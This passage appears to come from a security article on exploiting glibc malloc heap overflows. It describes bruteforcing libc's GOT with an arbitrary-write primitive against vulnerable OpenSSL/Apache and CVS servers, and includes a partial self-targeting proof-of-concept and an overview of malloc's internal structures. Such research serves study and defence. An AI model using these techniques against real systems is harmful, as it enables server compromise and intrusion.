7.3 and Slackware 2.2.19 (libc-2.2.3.so). Exploit code using this trick
is able to exploit the vulnerable OpenSSL/Apache servers without any
hardcoded addresses in at least the above mentioned default
distributions.

--] 4.5.3 Libc's GOT bruteforcing

In case the morecore trick doesn't work (we can always try, as it only
requires one attempt), which probably means our target is using a newer
libc, we still have the obtained glibc bin address. We know the glibc GOT
is going to be located above that address, so we just need to bruteforce
upwards until we hit an entry of a libc function that is going to be
called.

This bruteforce mechanism may take a while, but not more time than would
be needed to bruteforce the main object's GOT (assuming we had obtained
its approximate location somehow). To speed up the process, the
bruteforcing start point should be obtained by adjusting the retrieved
bin address by a fixed value. This value should be large enough to avoid
corrupting the arena, which would crash the process. Also, the
bruteforcing can be performed using a step size bigger than one. A higher
step value requires fewer tries, but may miss the GOT. The step size
should be chosen considering the size of the GOT and the number of GOT
entries accessed between tries (the more GOT entries the server uses, the
higher the probability of modifying an entry that is going to be
accessed). After each try, it is important to force the server to perform
as many actions as possible, in order to make it go through lots of
different libc calls, so the probability of using the GOT entry that was
overwritten is higher. Note the bruteforcing mechanism may crash the
process in several ways, as it is corrupting libc data; a sketch of the
search loop is shown below.
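The following is a minimal sketch of that search loop; it is not the
article's exploit code. target_aa4bmo() and poke_target() are
hypothetical placeholders for delivering the aa4bmo overwrite to the
target and for forcing the server through many libc calls, and
ADJUST/STEP mirror the values used in the proof of concept below:

  /* sketch of the libc GOT bruteforce described above; not the article's
     exploit code. target_aa4bmo() and poke_target() are hypothetical
     placeholders. */
  #include <stdio.h>

  #define ADJUST 0x200   /* skip past the rest of the arena               */
  #define STEP   0x2     /* in 4-byte words; bigger step = fewer tries    */
  #define TRIES  1024    /* how far above the bins we are willing to go   */

  static void target_aa4bmo(unsigned long what, unsigned long where){
    /* placeholder: send the request that writes 'what' at 'where' */
    printf("overwriting 0x%08lx\n", where);
  }

  static void poke_target(void){
    /* placeholder: issue as many harmless requests as possible so the
       clobbered GOT entry has a good chance of being used */
  }

  void bruteforce_libc_got(unsigned long bin_addr, unsigned long sc_addr){
    unsigned long where = bin_addr + ADJUST;
    int i;

    for(i = 0; i < TRIES; i++, where += STEP * 4){
      target_aa4bmo(sc_addr, where);
      poke_target();
      /* a real exploit would check for a shell / connect-back here; on a
         randomized target, remember the relative offset (where - bin_addr)
         so already tried offsets can be skipped after a crash */
    }
  }

  int main(void){
    /* example values only: the bin address leaked in the gdb session
       above and a made-up shellcode address */
    bruteforce_libc_got(0x4212E1A0UL, 0x08049A20UL);
    return 0;
  }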
As the address was obtained at runtime, we can be sure we are bruteforcing
the right place, even if the target randomizes the process/library
address space, and that we will eventually hit some GOT entry. In a
randomized load address scenario, if there is no relationship between the
load addresses of the crashed process (the one we obtained the bin
address from) and those of the new process handling our requests, we will
need to hit a GOT entry before the process we leaked from crashes (note
that forked processes may inherit the father's memory layout in some
randomization implementations, in which case the leaked address stays
valid). However, once a new bin address has been obtained, the
bruteforcing mechanism can take into account the offsets already tried,
as the relative offset between the bins and the GOT is constant.
Moreover, this technique applies to any process linked against glibc.
Note that we might also be able to exploit a server by bruteforcing some
specific function pointers (e.g. those located in structures such as
network output buffers), but this approach is more generic.

The libc GOT bruteforcing idea was successfully tested on Redhat 8.0,
Redhat 7.2 and Redhat 7.1 default installations. Exploit code
bruteforcing libc's GOT is able to exploit the vulnerable CVS servers
without any hardcoded addresses in at least the above mentioned default
distributions.

--] 4.5.3.1 Proof of concept 6 : Hinted libc's GOT bruteforcing

The following code bruteforces itself: the process tries to find itself,
finally ending up in a useless endless loop.

#include <stdio.h>
#include <stdlib.h>

#define ADJUST     0x200
#define STEP       0x2

#define LOOP_SC    "\xeb\xfe"
#define LOOP_SZ    2
#define SC_SZ      512
#define OUTPUT_SZ  64 * 1024

#define SOMEOFFSET(x) 11 + (rand() % ((x)-1-11))
#define SOMECHUNKSZ   32 + (rand() % 512)

#define PREV_INUSE     1
#define IS_MMAP        2
#define NON_MAIN_ARENA 4

unsigned long *aa4bmoPrimitive(unsigned long what, unsigned long where,
                               unsigned long sz){
  unsigned long *unlinkMe;
  int i=0;

  if(sz<13) sz = 13;
  unlinkMe=(unsigned long*)malloc(sz*sizeof(unsigned long));
  unlinkMe[i++] = -4;
  unlinkMe[i++] = -4;
  unlinkMe[i++] = -4;
  unlinkMe[i++] = what;
  unlinkMe[i++] = where-8;
  unlinkMe[i++] = -4;
  unlinkMe[i++] = -4;
  unlinkMe[i++] = -4;
  unlinkMe[i++] = what;
  unlinkMe[i++] = where-8;
  for(;i<sz;i++)
    unlinkMe[i] = -4;
  ...

---------------------------------------------------------------------------

--] Appendix I - malloc internal structures overview

These are the macros malloc uses to map a chunk size to its bin index:

#define smallbin_index(sz) (((unsigned long)(sz)) >> 3)
#define bin_index(sz)                                                          \
 (((((unsigned long)(sz)) >> 9) ==    0) ?       (((unsigned long)(sz)) >>  3):\
  ((((unsigned long)(sz)) >> 9) <=    4) ?  56 + (((unsigned long)(sz)) >>  6):\
  ((((unsigned long)(sz)) >> 9) <=   20) ?  91 + (((unsigned long)(sz)) >>  9):\
  ((((unsigned long)(sz)) >> 9) <=   84) ? 110 + (((unsigned long)(sz)) >> 12):\
  ((((unsigned long)(sz)) >> 9) <=  340) ? 119 + (((unsigned long)(sz)) >> 15):\
  ((((unsigned long)(sz)) >> 9) <= 1364) ? 124 + (((unsigned long)(sz)) >> 18):\
                                           126)

From the source documentation we know that 'an arena is a configuration
of malloc_chunks together with an array of bins. One or more 'heaps' are
associated with each arena, except for the 'main_arena', which is
associated only with the 'main heap', i.e. the conventional free store
obtained with calls to MORECORE()...', which is the one we are interested
in. This is what an arena looks like:

typedef struct _arena {
  mbinptr av[2*NAV + 2];
  struct _arena *next;
  size_t size;
#if THREAD_STATS
  long stat_lock_direct, stat_lock_loop, stat_lock_wait;
#endif
  mutex_t mutex;
} arena;

'av' is the array where the bins are kept; the small sketch below
illustrates how a bin index maps onto it.
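As a side illustration (a simplified sketch with stand-in type
definitions, not actual glibc code), the following program shows how the
_bin_at() arithmetic of the macros shown next turns a bin index into a
fake chunk whose fd/bk fields land exactly on that bin's two slots in
av[]; on the 32-bit layout used throughout this paper, bin 64 ends up
0x200 bytes past the arena base, matching the offsets seen in the
morecore proof of concept:

  /* simplified stand-ins for the real glibc structures; illustration only */
  #include <assert.h>
  #include <stddef.h>
  #include <stdio.h>

  typedef struct malloc_chunk {
    size_t              prev_size;
    size_t              size;
    struct malloc_chunk *fd;
    struct malloc_chunk *bk;
  } *mbinptr;

  #define NAV     128
  #define SIZE_SZ (sizeof(size_t))

  static mbinptr av[2*NAV + 2];          /* stands in for main_arena.av */

  /* same arithmetic as glibc's _bin_at(a, i) */
  #define bin_at(i) ((mbinptr)((char*)&av[2*(i)+2] - 2*SIZE_SZ))

  int main(void){
    int i = 64;
    mbinptr b = bin_at(i);

    /* the fake chunk's fd/bk fields overlay exactly this bin's two slots */
    assert((void*)&b->fd == (void*)&av[2*i + 2]);
    assert((void*)&b->bk == (void*)&av[2*i + 3]);

    /* on 32 bits this prints 512 (0x200), i.e. main_arena + 0x200 for bin 64 */
    printf("bin %d starts %ld bytes past av[0]\n", i,
           (long)((char*)b - (char*)av));
    return 0;
  }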
These are the macros used throughout the source code to access the bins.
Note that the first two bins are never used as ordinary bins: they hold
the topmost chunk, the last_remainder chunk and a bitvector used to
improve seek time, though this is not really important for us.

/* bitvector of nonempty blocks */
#define binblocks(a)      (bin_at(a,0)->size)

/* The topmost chunk */
#define top(a)            (bin_at(a,0)->fd)

/* remainder from last split */
#define last_remainder(a) (bin_at(a,1))

#define bin_at(a, i)  BOUNDED_1(_bin_at(a, i))
#define _bin_at(a, i) ((mbinptr)((char*)&(((a)->av)[2*(i)+2]) - 2*SIZE_SZ))

Finally, the main_arena...

#define IAV(i) _bin_at(&main_arena, i), _bin_at(&main_arena, i)

static arena main_arena = {
    {
 0, 0,
 IAV(0),   IAV(1),   IAV(2),   IAV(3),   IAV(4),   IAV(5),   IAV(6),   IAV(7),
 IAV(8),   IAV(9),   IAV(10),  IAV(11),  IAV(12),  IAV(13),  IAV(14),  IAV(15),
 IAV(16),  IAV(17),  IAV(18),  IAV(19),  IAV(20),  IAV(21),  IAV(22),  IAV(23),
 IAV(24),  IAV(25),  IAV(26),  IAV(27),  IAV(28),  IAV(29),  IAV(30),  IAV(31),
 IAV(32),  IAV(33),  IAV(34),  IAV(35),  IAV(36),  IAV(37),  IAV(38),  IAV(39),
 IAV(40),  IAV(41),  IAV(42),  IAV(43),  IAV(44),  IAV(45),  IAV(46),  IAV(47),
 IAV(48),  IAV(49),  IAV(50),  IAV(51),  IAV(52),  IAV(53),  IAV(54),  IAV(55),
 IAV(56),  IAV(57),  IAV(58),  IAV(59),  IAV(60),  IAV(61),  IAV(62),  IAV(63),
 IAV(64),  IAV(65),  IAV(66),  IAV(67),  IAV(68),  IAV(69),  IAV(70),  IAV(71),
 IAV(72),  IAV(73),  IAV(74),  IAV(75),  IAV(76),  IAV(77),  IAV(78),  IAV(79),
 IAV(80),  IAV(81),  IAV(82),  IAV(83),  IAV(84),  IAV(85),  IAV(86),  IAV(87),
 IAV(88),  IAV(89),  IAV(90),  IAV(91),  IAV(92),  IAV(93),  IAV(94),  IAV(95),
 IAV(96),  IAV(97),  IAV(98),  IAV(99),  IAV(100), IAV(101), IAV(102), IAV(103),
 IAV(104), IAV(105), IAV(106), IAV(107), IAV(108), IAV(109), IAV(110), IAV(111),
 IAV(112), IAV(113), IAV(114), IAV(115), IAV(116), IAV(117), IAV(118), IAV(119),
 IAV(120), IAV(121), IAV(122), IAV(123), IAV(124), IAV(125), IAV(126), IAV(127)
    },
    &main_arena, /* next */
    0, /* size */
#if THREAD_STATS
    0, 0, 0, /* stat_lock_direct, stat_lock_loop, stat_lock_wait */
#endif
    MUTEX_INITIALIZER /* mutex */
};

The main_arena is the place where the allocator stores the 'bins' to
which the free chunks are linked depending on their size. The little
diagram below summarizes all the structures detailed above:

      @ libc's DATA

  [bin_n]
  [ chunk ptr] ----> [<- chunk ->] [<- chunk ->] [<- fd    (first chunk)
  [ chunk ptr] ----> [<- chunk ->] [<- chunk ->] [<- bk    (last chunk)
  [bin_n+1]
     .
     .
     .
  [bin_X]
  [ chunk ptr] ----> [<- fd
  [ chunk ptr] ----> [<- bk   [ lonely but interesting chunk ]
     .
     .

|=[ EOF ]=---------------------------------------------------------------=|